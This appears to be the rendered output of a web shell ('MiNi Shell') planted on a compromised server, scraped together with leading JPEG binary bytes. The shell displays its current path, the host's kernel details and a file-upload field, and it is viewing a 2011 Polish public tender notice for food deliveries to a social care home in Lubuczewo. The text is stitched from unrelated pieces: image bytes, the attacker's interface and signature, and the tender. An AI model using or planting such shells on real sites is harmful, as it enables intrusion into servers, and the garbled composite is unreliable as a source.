JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110201/35979-N-2011.html

<p class="kh_header"><b>Słupsk: dostawy artykułów spożywczych do Domu Pomocy Społecznej w Lubuczewie na rok 2011.</b><br>
<b>Numer ogłoszenia: 35979 - 2011; data zamieszczenia: 01.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Lubuczewo 29A, 76-200 Słupsk, woj. pomorskie, tel. 0-59 846 26 30, faks 0-59 849 19 68.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy artykułów spożywczych do Domu Pomocy Społecznej w Lubuczewie na rok 2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> części- 1 dostawy artykułów mrożonych 
części- 2 dostawy artykułów mleczarskich,
części- 3 dostawy różnych produktów spożywczych.
MIESZANKA WARZYWNA 7-SKŁ. MROŻONA  kg	      100,00
PIEROGI Z TRUSKAWKAMI MROŻONE	       kg         300,00
PYZY ZIEMNIACZANE MROŻONE	       kg         100,00
PYZY Z MIĘSEM MROŻONE	                    kg	      250,00
WŁOSZCZYZNA MROŻONA	                    kg	      500,00
FASOLKA SZPARAGOWA MROŻONA	       kg	        80,00
BROKUŁY MROŻONE	                    kg	        50,00
PIEROGI ZE ŚLIWKAMI MROŻONE               kg	      250,00
KALAFIOR MROŻONY	                    kg	      130,00
MIESZANKA CHIŃSKA MROŻONA                kg	        50,00
PIEROGI Z KAPUSTĄ MROŻONE                  kg	       150,00
ZAPIEKANKA	                                szt. 	     1 000,00
MASŁO ROŚLINNE 250 g 	                   szt.	     7 000,00
MASŁO 250 g	                                szt.	       500,00
JOGURT SMAKOWY 150 g	                   szt.	     5 400,00
JOGURT NATURALNY 370 g	                   szt.	        400,00
SEREK HOMOGENIZOWANY 100 g	      szt.	        500,00
SER TOPIONY 100 g	                   szt.	      5 240,00
SER ŻÓŁTY	                                 kg	        600,00
TWARÓG PÓŁTUSTY	                    kg	         400,00
TWARÓG CHUDY 	                                 kg	         200,00
MLEKO 2% UHT 1l	                                 szt.	       6 000,00
ŚMIETANA 12% 400 g	                    szt.	       1 500,00
ŚMIETANA 30% 200 g	                    szt.	           30,00
SYROP OWOCOWY 4,96 l	szt.	100,00
NAPÓJ OWOCOWY 2 l	szt.	100,00
SOK 1l	szt.	70,00
WODA MINERALNA 1,5 l	szt.	600,00
WODA MINERALNA 0,5 l	szt.	150,00
ŻUR BIAŁY 500 ml	szt.	40,00
PRZYPRAWA W PŁYNIE DO ZUP 1l	szt.	100,00
ROSOŁKI DROBIOWE KOSTKA 60 g	szt.	250,00
PRZYPRAWA WARZYWKO 200 g	szt.	350,00
PRZYPRAWA KUCHAREK 200 g	szt.	350,00
ZIELE ANGIELSKIE 20 g	szt.	50,00
KOPER SUSZONY 10 g	szt.	50,00
NATKA PIETRUSZKI SUSZONA 10 g	szt.	250,00
PIEPRZ CZARNY 20 g	szt.	400,00
LIŚĆ  LAUROWY 15 g	szt.	25,00
LIŚĆ LAUROWY 12 g	szt.	50,00
ŻELATYNA 50 g	szt.	100,00
CYNAMON 20 g	szt.	100,00
PAPRYKA MIELONA 20 g	szt.	80,00
KWASEK CYTRYNOWY 20 g	szt.	90,00
MAJERANEK 20 g	szt.	250,00
KISIEL 40 g	szt.	200,00
BUDYŃ 40 g	szt.	200,00
ŚLIWKI SUSZONE 100 g 	szt.	50,00
MĄKA PSZENNA 1 kg	kg	380,00
MĄKA ZIEMNIACZANA 1 kg	kg	60,00
MĄKA TORTOWA 1 kg	kg	100,00
KASZA MANNA 1 kg	kg	100,00
KASZA JĘCZMIENNA 1 kg	kg	400,00
KASZA GRYCZANA  1 kg	kg	400,00
PŁATKI OWSIANE 1 kg	kg	120,00
RYŻ 1 kg	kg	250,00
SÓL 1 kg	kg	500,00
CUKIER 1 kg	kg	1 100,00
MAKARON NITKI 400 g	szt.	130,00
MAKARON ŚWIDEREK 400 g	szt.	300,00
MAKARON GNIAZDA 400 g	szt.	50,00
HERBATA OWOCOWA 20 SASZ,	szt.	400,00
HERBATA OWOCOWA GRANULOWANA 300 g	szt.	160,00
HERBATA MIĘTOWA 20 SASZ,	szt.	300,00
HERBATA GRANULOWANA CZARNA 100 g	szt.	600,00
KAWA INKA 150 g	szt.	200,00
KAKAO 200 g	szt.	52,00
MIESZANKA WARZYWNA 3-SKŁ. 460 g	szt.	200,00
PIECZARKI MARYNOWANE 300 g	szt.	10,00
SOS SŁODKO-KWAŚNY 300 g	szt.	100,00
SZCZAW KONSERWOWY 900 g	szt.	70,00
PAPRYKA KONSERWOWA 900 g	szt.	140,00
OGÓRKI KONSERWOWE 870 g	szt.	160,00
GROSZEK KONSERWOWY 400 g	szt.	80,00
FOSOLA CZERW.KONSERW.400 g	szt.	40,00
KONCENTRAT POMIDOROWY 1kg	szt.	110,00
DŻEM 280 g	szt.	1 300,00
MUSZTARDA 1kg	szt.	50,00
MUSZTARDA 500g	szt.	40,00
KECZUP 480 g	szt.	100,00
MAJONEZ 700 ml	szt.	230,00
MAJONEZ LIGHT O OBNIŻ. ZAW. TŁUSZCZU 	szt.	60,00
ĆWIKŁA 300 g	szt.	20,00
CHRZAN 190 g	szt.	20,00
OCET 500 ml	szt.	90,00
OLEJ ROŚLINNY 1l	szt.	200,00
FASOLA BIAŁA	kg	200,00
GROCH ŁUSKANY	kg	120,00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.33.11.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy dotyczące:
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.
2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu                                    z postępowania  o udzielenie zamówienia zgodnie z art. 24 ust. 1 ustawy.
3.	Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu  o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt IX specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki są przez Wykonawcę spełnione.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu  o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt IX specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki są przez Wykonawcę spełnione.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu  o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt IX specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki są przez Wykonawcę spełnione.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu  o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt IX specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki są przez Wykonawcę spełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dpslubuczewo.mojbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ W LUBUCZEWIE , LUBUCZEWO 29 A, 76-200 SŁUPSK. POKÓJ NR 39.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2011 godzina 10:00, miejsce: DOM POMOCY SPOŁECZNEJ W LUBUCZEWIE , LUBUCZEWO 29 A, 76-200 SŁUPSK. POKÓJ NR 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> części- 1 dostawy artykułów mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	MIESZANKA WARZYWNA 7-SKŁ. MROŻONA	                                            kg	                             100,00

2.	PIEROGI Z TRUSKAWKAMI MROŻONE	                                           kg	                                          300,00

3.	PYZY ZIEMNIACZANE MROŻONE	                                 kg	                    
100,00

4.	PYZY Z MIĘSEM MROŻONE	
kg	
250,00

5.	WŁOSZCZYZNA MROŻONA	
kg	
500,00

6.	FASOLKA SZPARAGOWA MROŻONA	
kg	
80,00

7.	BROKUŁY MROŻONE	
kg	
50,00

8.	PIEROGI ZE ŚLIWKAMI MROŻONE	
kg	
250,00

9.	KALAFIOR MROŻONY	
kg	
130,00

10.	MIESZANKA CHIŃSKA MROŻONA	
kg	
50,00

11.	PIEROGI Z KAPUSTĄ MROŻONE	
kg	
150,00

12.	ZAPIEKANKA	
szt. 	
1 000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> części- 2 dostawy artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	MASŁO ROŚLINNE 250 g 	szt.	7 000,00

2.	MASŁO 250 g	szt.	500,00

3.	JOGURT SMAKOWY 150 g	szt.	5 400,00

4.	JOGURT NATURALNY 370 g	szt.	400,00

5.	SEREK HOMOGENIZOWANY 100 g	szt.	500,00

6.	SER TOPIONY 100 g	szt.	5 240,00

7.	SER ŻÓŁTY	kg	600,00

8.	TWARÓG PÓŁTUSTY	kg	400,00

9.	TWARÓG CHUDY 	kg	200,00

10.	MLEKO 2% UHT 1l	szt.	6 000,00
                                             
11.	ŚMIETANA 12% 400 g	szt.	1 500,00

12.	ŚMIETANA 30% 200 g	szt.	30,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3- dostawy różnych artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SYROP OWOCOWY 4,96 l	szt.	100,00	
NAPÓJ OWOCOWY 2 l	szt.	100,00	
SOK 1l	szt.	70,00	
WODA MINERALNA 1,5 l	szt.	600,00	
WODA MINERALNA 0,5 l	szt.	150,00	
ŻUR BIAŁY 500 ml	szt.	40,00	
PRZYPRAWA W PŁYNIE DO ZUP 1l	szt.	100,00	
ROSOŁKI DROBIOWE KOSTKA 60 g	szt.	250,00	
PRZYPRAWA WARZYWKO 200 g	szt.	350,00	
PRZYPRAWA KUCHAREK 200 g	szt.	350,00	
ZIELE ANGIELSKIE 20 g	szt.	50,00	
KOPER SUSZONY 10 g	szt.	50,00	
NATKA PIETRUSZKI SUSZONA 10 g	szt.	250,00	
PIEPRZ CZARNY 20 g	szt.	400,00	
LIŚĆ  LAUROWY 15 g	szt.	25,00	
LIŚĆ LAUROWY 12 g	szt.	50,00	
ŻELATYNA 50 g	szt.	100,00	
CYNAMON 20 g	szt.	100,00	
PAPRYKA MIELONA 20 g	szt.	80,00	
KWASEK CYTRYNOWY 20 g	szt.	90,00	
MAJERANEK 20 g	szt.	250,00	
KISIEL 40 g	szt.	200,00	
BUDYŃ 40 g	szt.	200,00	
ŚLIWKI SUSZONE 100 g 	szt.	50,00	
MĄKA PSZENNA 1 kg	kg	380,00	
MĄKA ZIEMNIACZANA 1 kg	kg	60,00	
MĄKA TORTOWA 1 kg	kg	100,00	
KASZA MANNA 1 kg	kg	100,00	
KASZA JĘCZMIENNA 1 kg	kg	400,00	
KASZA GRYCZANA  1 kg	kg	400,00	
PŁATKI OWSIANE 1 kg	kg	120,00	
RYŻ 1 kg	kg	250,00	
SÓL 1 kg	kg	500,00	
CUKIER 1 kg	kg	1 100,00	
MAKARON NITKI 400 g	szt.	130,00	
MAKARON ŚWIDEREK 400 g	szt.	300,00	
MAKARON GNIAZDA 400 g	szt.	50,00	
HERBATA OWOCOWA 20 SASZ,	szt.	400,00	
HERBATA OWOCOWA GRANULOWANA 300 g	szt.	160,00	
HERBATA MIĘTOWA 20 SASZ,	szt.	300,00	
HERBATA GRANULOWANA CZARNA 100 g	szt.	600,00	
KAWA INKA 150 g	szt.	200,00	
KAKAO 200 g	szt.	52,00	
MIESZANKA WARZYWNA 3-SKŁ. 460 g	szt.	200,00	
PIECZARKI MARYNOWANE 300 g	szt.	10,00	
SOS SŁODKO-KWAŚNY 300 g	szt.	100,00	
SZCZAW KONSERWOWY 900 g	szt.	70,00	
PAPRYKA KONSERWOWA 900 g	szt.	140,00	
OGÓRKI KONSERWOWE 870 g	szt.	160,00	
GROSZEK KONSERWOWY 400 g	szt.	80,00	
FOSOLA CZERW.KONSERW.400 g	szt.	40,00	
KONCENTRAT POMIDOROWY 1kg	szt.	110,00	
DŻEM 280 g	szt.	1 300,00	
MUSZTARDA 1kg	szt.	50,00	
MUSZTARDA 500g	szt.	40,00	
KECZUP 480 g	szt.	100,00	
MAJONEZ 700 ml	szt.	230,00	
MAJONEZ LIGHT O OBNIŻ. ZAW. TŁUSZCZU 	szt.	60,00	
ĆWIKŁA 300 g	szt.	20,00	
CHRZAN 190 g	szt.	20,00	
OCET 500 ml	szt.	90,00	
OLEJ ROŚLINNY 1l	szt.	200,00	
FASOLA BIAŁA	kg	200,00	
GROCH ŁUSKANY	kg	120,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com